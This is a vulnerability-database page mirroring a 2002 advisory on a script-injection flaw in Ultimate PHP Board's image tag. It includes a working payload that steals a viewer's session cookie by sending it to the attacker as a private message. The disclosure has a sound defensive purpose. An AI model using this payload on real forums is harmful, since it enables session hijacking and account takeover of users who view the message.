Ultimate PHP Board 1.0/1.1 – Image Tag Script Injection

Ultimate PHP Board 1.0/1.1 – Image Tag Script Injection

漏洞ID 1053581 漏洞类型
发布时间 2002-04-25 更新时间 2002-04-25
图片[1]-Ultimate PHP Board 1.0/1.1 – Image Tag Script Injection-安全小百科CVE编号 N/A
图片[2]-Ultimate PHP Board 1.0/1.1 – Image Tag Script Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/21423
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/4603/info

Ultimate PHP Board (UPB) is web forum software. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems.

Ultimate PHP Board does not filter script code from image tags. This may allow an attacker to include script code in forum messages. Injected script code will be executed in the browser of an arbitrary web user who views the malicious forum message, in the context of the website running UPB.

It may be possible to inject script code into other UPB-Code formatting tags, though this has not been confirmed. 

[ img]javascript:window.open(' index.php?upb=pm&mode=send&send=yes&target_id=SONPROPREID&betreff=cookie&pm=' +document.cookie+ ' &smilies=1&use_upbcode=1&pmbox_id=IDDELAVICTIME&check=yes ')[/img ]

相关推荐: Multiple Xwindows Client for 9x / Nt / 2000 Default Export Vulnerability

Multiple Xwindows Client for 9x / Nt / 2000 Default Export Vulnerability 漏洞ID 1104131 漏洞类型 Configuration Error 发布时间 2000-06-26 更新时…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享